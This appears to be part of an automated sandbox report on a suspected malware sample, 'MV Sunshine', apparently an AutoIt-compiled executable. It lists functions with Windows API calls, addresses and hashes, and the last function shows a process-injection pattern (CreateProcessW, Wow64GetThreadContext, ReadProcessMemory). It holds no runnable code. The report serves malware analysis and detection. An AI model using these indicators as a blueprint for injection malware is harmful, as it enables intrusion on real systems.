Part of subcall function 00642F95: GetLastError.KERNEL32(00000000,?,00649C64), ref: 00642FBB

_free.LIBCMT ref: 006899A6

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: 922d4df5b64e1696f8af207ae7c752e1e6b30532c460fe4269bae0bb53f03174
Instruction ID: 765537ab0cf664cc5d5216c4460ec2c39e57f3b39ee49d33162431be9f5a6a0c
Opcode Fuzzy Hash: 922d4df5b64e1696f8af207ae7c752e1e6b30532c460fe4269bae0bb53f03174
Instruction Fuzzy Hash: D95172B1D04619AFDF649F64DC41AAEBBBAEF48300F1405AEF209A7241DB315E90CF58

Function 0064493A Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 006449D0
__flush.LIBCMT ref: 006449F0
__write.LIBCMT ref: 00644A23
__flsbuf.LIBCMT ref: 00644A51

Part of subcall function 00648D68: __getptd_noexit.LIBCMT ref: 00648D68

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: 6b900c82ae833c016f0ad4fafe5841f230cacf6ecaddb2f96621bb99e00bcb06
Instruction ID: e46de704283f389da5bdce2e2246ecaf8a5244e27728834553701a2bf92bd016
Opcode Fuzzy Hash: 6b900c82ae833c016f0ad4fafe5841f230cacf6ecaddb2f96621bb99e00bcb06
Instruction Fuzzy Hash: FF41C471A006059BDB28CEA9C882BAF77A7EF80360B24817DE85587784DF70DD819B48

Function 00624DD0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00624E1A

Strings

AU3!P/k, xrefs: 00624E14
EA06, xrefs: 0065DCF5

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: _memmove
String ID: AU3!P/k$EA06
API String ID: 4104443479-947634993
Opcode ID: 824e637fedb401d9ad5f9212e54f3b427d516e04c6b7173ce479f7ad1ae462bd
Instruction ID: 894c744ddf08f5096d66fd4f804c31bff25e585811efbdd3e19fda6eff165732
Opcode Fuzzy Hash: 824e637fedb401d9ad5f9212e54f3b427d516e04c6b7173ce479f7ad1ae462bd
Instruction Fuzzy Hash: 81418C21A04E745BEF219B64EC517FE7FA7AF41340F194068ECC29B282DE319D858FA1

Function 006273E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0065EE62
GetOpenFileNameW.COMDLG32(?), ref: 0065EEAC

Part of subcall function 006248AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006248A1,?,?,006237C0,?), ref: 006248CE

Part of subcall function 006409D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 006409F4

Strings

X, xrefs: 0065EE7A

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X
API String ID: 3777226403-3081909835
Opcode ID: 24b1c5fd526606bb7fd250991bd4f8ae55ea4162d8ce2a35670f7626b9698aa9
Instruction ID: 50df8c0017672f510f53539e32d15c1b30f7da0dde45549f76a2d98a59e31115
Opcode Fuzzy Hash: 24b1c5fd526606bb7fd250991bd4f8ae55ea4162d8ce2a35670f7626b9698aa9
Instruction Fuzzy Hash: 8E21C671D106689BCF45DF94D845BEE7BFA9F49300F00441AF408E7381DBB45A898FA5

Function 0068901B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00689036
__fread_nolock.LIBCMT ref: 0068904B

Strings

EA06, xrefs: 0068907D

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: e7d157aa4257261df02cb4515d9789bc05b3e66965ee5343f48f4e693d261333
Instruction ID: 3999354e0636c14ae2ca577c39e323ab3aabff2fe1aebe128fb1869047e9f195
Opcode Fuzzy Hash: e7d157aa4257261df02cb4515d9789bc05b3e66965ee5343f48f4e693d261333
Instruction Fuzzy Hash: CD01F9718042186FDB28C6A8C816EFE7BF89B11301F00429EF553D2181E975A604CB60

Function 00689B6D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 00689B82
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00689B99

Strings

aut, xrefs: 00689B93

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 687327fc7aeb3794374f96d444e79ab2f91bdcdf3d0dab16a1db6a0751fef771
Instruction ID: f172440a8a0d5deaf7127b854cfd0ffb467cd282095a4691fa92d5fcf8700d17
Opcode Fuzzy Hash: 687327fc7aeb3794374f96d444e79ab2f91bdcdf3d0dab16a1db6a0751fef771
Instruction Fuzzy Hash: F5D05E7994030DABDB10ABD0DC0EFDA776DE704701F0042A1BE94911A1DEB466988F92

Function 0069CDF1 Relevance: 4.9, APIs: 3, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0a1d51966e9d5da9aed78bdc8a89459bff246cea4f12666da1cb2f4121610f5
Instruction ID: 5899c4d7603fc0f3161d11427ca960f8647bb88016b6f06634675ea7bf9f5029
Opcode Fuzzy Hash: e0a1d51966e9d5da9aed78bdc8a89459bff246cea4f12666da1cb2f4121610f5
Instruction Fuzzy Hash: 9AF15D719087019FCB54DF28C485A6ABBEAFF88314F14892EF8999B351D731E945CF82

Function 0064594C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 00645963

Part of subcall function 0064A3AB: __NMSG_WRITE.LIBCMT ref: 0064A3D2
Part of subcall function 0064A3AB: __NMSG_WRITE.LIBCMT ref: 0064A3DC

__NMSG_WRITE.LIBCMT ref: 0064596A

Part of subcall function 0064A408: GetModuleFileNameW.KERNEL32(00000000,006E43BA,00000104,?,00000001,00000000), ref: 0064A49A
Part of subcall function 0064A408: ___crtMessageBoxW.LIBCMT ref: 0064A548

Part of subcall function 006432DF: ___crtCorExitProcess.LIBCMT ref: 006432E5
Part of subcall function 006432DF: ExitProcess.KERNEL32 ref: 006432EE

Part of subcall function 00648D68: __getptd_noexit.LIBCMT ref: 00648D68

RtlAllocateHeap.NTDLL(00BC0000,00000000,00000001,00000000,?,?,?,00641013,?), ref: 0064598F

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: 5aaef4bb1ad50fae3327757f32b630175e47e8f135bfe0b7532bc315c207d036
Instruction ID: 3e707a415265bbf5a8feb1589b43565354c6c6d0809eabf6c276f24610bd9ad5
Opcode Fuzzy Hash: 5aaef4bb1ad50fae3327757f32b630175e47e8f135bfe0b7532bc315c207d036
Instruction Fuzzy Hash: 3C01DE32241B95EFE7613B75E842AAE738B9F52770F10002EF502AB282DF709D018669

Function 00689B2C Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,006897D2,?,?,?,?,?,00000004), ref: 00689B45
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,006897D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00689B5B
CloseHandle.KERNEL32(00000000,?,006897D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00689B62

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: 984edd8c5cfcb4c7cdee43a64191c4dea6422ca9f85afe1b74265d5536eacb40
Instruction ID: d6e73b8dc1bfe3bb73f162948e4fc33a5b32c478d98d88e0f6827d83df354a12
Opcode Fuzzy Hash: 984edd8c5cfcb4c7cdee43a64191c4dea6422ca9f85afe1b74265d5536eacb40
Instruction Fuzzy Hash: 9AE08632280214BBDB313B94EC09FDA7B5AAB06761F144220FB54690E087B179119B99

Function 00688F97 Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00688FA5

Part of subcall function 00642F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00649C64), ref: 00642FA9
Part of subcall function 00642F95: GetLastError.KERNEL32(00000000,?,00649C64), ref: 00642FBB

_free.LIBCMT ref: 00688FB6
_free.LIBCMT ref: 00688FC8

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 180ac2cc07007adee99720b26c657bf09b4177bae862674a470a9d0e5fc62c6e
Instruction ID: 90bd830bd0dceba243c70f9c6b87466d8eed754a851eff3a1fdc75781f92f270
Opcode Fuzzy Hash: 180ac2cc07007adee99720b26c657bf09b4177bae862674a470a9d0e5fc62c6e
Instruction Fuzzy Hash: 4BE012A16097128ECBA4B978AD50AD35BEF5F483D07E8091DB509DB242DE24F8558628

Function 0062AB23 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON

Download Yara Rule

Strings

CALL, xrefs: 0066002B

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID:
String ID: CALL
API String ID: 0-4196123274
Opcode ID: fde746e8bc8ac338105347862e461243994c7c31667f32bdd3dae867ae2dc010
Instruction ID: 1c840fe79e919f7eeb286968d62654283f33072c0aae1568cfb13274e9420db3
Opcode Fuzzy Hash: fde746e8bc8ac338105347862e461243994c7c31667f32bdd3dae867ae2dc010
Instruction Fuzzy Hash: 0E223770508661CFD724DF54D494A6ABBE2FF84300F15896DE8868B362D771ED86CF82

Function 0062492E Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00624992

Part of subcall function 006435AC: __lock.LIBCMT ref: 006435B2
Part of subcall function 006435AC: DecodePointer.KERNEL32(00000001,?,006249A7,006781BC), ref: 006435BE
Part of subcall function 006435AC: EncodePointer.KERNEL32(?,?,006249A7,006781BC), ref: 006435C9

Part of subcall function 00624A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00624A73
Part of subcall function 00624A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00624A88

Part of subcall function 00623B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00623B7A
Part of subcall function 00623B4C: IsDebuggerPresent.KERNEL32 ref: 00623B8C
Part of subcall function 00623B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,006E62F8,006E62E0,?,?), ref: 00623BFD
Part of subcall function 00623B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00623C81

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 006249D2

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
String ID:
API String ID: 1438897964-0
Opcode ID: ec3491c9b377ced40d971db9b2051c8908d41cbcb8b7572fbd7d29ae1015063a
Instruction ID: 3b9358cf653f9f0df3a262adcb3db7cc8f453fa1559ca9e6d2c1ac6cd3490698
Opcode Fuzzy Hash: ec3491c9b377ced40d971db9b2051c8908d41cbcb8b7572fbd7d29ae1015063a
Instruction Fuzzy Hash: 92118C719083619FC700EF69EC8590ABFEAEB94750F00451EF5458B2B1DB709645CF96

Function 00625DF9 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00625981,?,?,?,?), ref: 00625E27
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00625981,?,?,?,?), ref: 0065E19C

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 82e71a53e4f47eb3ea9148a2d820ca69b74a38bb837536f7c0d87c3d188df6d2
Instruction ID: e9af98fbcd3abd52a97bdb6bc4589b07a278f6b7b320f25f72d926a0cbf10edd
Opcode Fuzzy Hash: 82e71a53e4f47eb3ea9148a2d820ca69b74a38bb837536f7c0d87c3d188df6d2
Instruction Fuzzy Hash: A701B970244B18BEF7341E14DC86FB637DDEB01768F108318BAE65A2E0C6B45E458F50

Function 00640FF6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0064594C: __FF_MSGBANNER.LIBCMT ref: 00645963
Part of subcall function 0064594C: __NMSG_WRITE.LIBCMT ref: 0064596A
Part of subcall function 0064594C: RtlAllocateHeap.NTDLL(00BC0000,00000000,00000001,00000000,?,?,?,00641013,?), ref: 0064598F

std::exception::exception.LIBCMT ref: 0064102C
__CxxThrowException@8.LIBCMT ref: 00641041

Part of subcall function 006487DB: RaiseException.KERNEL32(?,?,?,006DBAF8,00000000,?,?,?,?,00641046,?,006DBAF8,?,00000001), ref: 00648830

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: 88d14d6e4fb489f3ccb04d2e0eab090818f513cd50c031100c827fe0ca87be7a
Instruction ID: 8a640efbcb1436be535114733047498eb8c6cbe16b2df871646ae4b89d4cce38
Opcode Fuzzy Hash: 88d14d6e4fb489f3ccb04d2e0eab090818f513cd50c031100c827fe0ca87be7a
Instruction Fuzzy Hash: 12F0A47550025DA6CB60BE58EC259DF7BEF9F02750F10042AF8049A692DFB18AD08298

Function 0064582D Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 0064585C
__lock_file.LIBCMT ref: 0064587D

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: __lock_file_memset
String ID:
API String ID: 26237723-0
Opcode ID: f57d7ef24d560aab537a6f3498eac3088a6cb1f3289ed9f815160f726ed0d3a5
Instruction ID: 881636028c4d6ca3f1780ef8472b15208a7debd513359e81d29e7ee33201fc58
Opcode Fuzzy Hash: f57d7ef24d560aab537a6f3498eac3088a6cb1f3289ed9f815160f726ed0d3a5
Instruction Fuzzy Hash: 3601D431C00618EFCF62BF698C014CE7B63AF80360F048219F8141B2A2DF318A11DB95

Function 006455D6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00648D68: __getptd_noexit.LIBCMT ref: 00648D68

__lock_file.LIBCMT ref: 0064561B

Part of subcall function 00646E4E: __lock.LIBCMT ref: 00646E71

__fclose_nolock.LIBCMT ref: 00645626

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: f21cfc1e9c249882f85c3b1c6eedab7a5256e18935a4df2bce50ef126903bfa4
Instruction ID: b78b62e7f0a2d20cff908d82cf9a3e53ec68d4e53e43f650a28ddc1719cec6ec
Opcode Fuzzy Hash: f21cfc1e9c249882f85c3b1c6eedab7a5256e18935a4df2bce50ef126903bfa4
Instruction Fuzzy Hash: 9FF0B471801B059FDBA0BF75880276E77E36F42734F56820EA416AB1D3CF7C89029B59

Function 006281C1 Relevance: 2.6, APIs: 2, Instructions: 54COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,?,?,?,0062558F,?,?,?,?,?), ref: 006281DA
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,?,?,0062558F,?,?,?,?,?), ref: 0062820D

Part of subcall function 006278AD: _memmove.LIBCMT ref: 006278E9

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: ByteCharMultiWide$_memmove
String ID:
API String ID: 3033907384-0
Opcode ID: 9f4618003fb7645f1734ba70bde86d99e4cf4cd498e6c9ce9f120f3b6c503bd4
Instruction ID: ff8b9f81a6801c0452fa07f2fb26b6e9a9dbb6e9c7e6162514df7fa063cbd179
Opcode Fuzzy Hash: 9f4618003fb7645f1734ba70bde86d99e4cf4cd498e6c9ce9f120f3b6c503bd4
Instruction Fuzzy Hash: 9501A231202514BFEB246B25ED46F7B3B5EEB8A760F10802AFD05CE190DE309C40CAB5

Function 00F61D2D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 00F624EB
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00F62581
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00F625A3

Memory Dump Source

Source File: 00000000.00000002.2118803858.0000000000F60000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_MV Sunshine.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
Instruction ID: cfe21eedf2a48bbed793ccf32fbbbe161bd54ade79c3c0dc9aef563dc1ae4fd3
Opcode Fuzzy Hash: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
Instruction Fuzzy Hash: DD12CD24E24658C6EB24DF64D8507DEB232EF68300F1090E9910DEB7A5E77A4F81DF5A

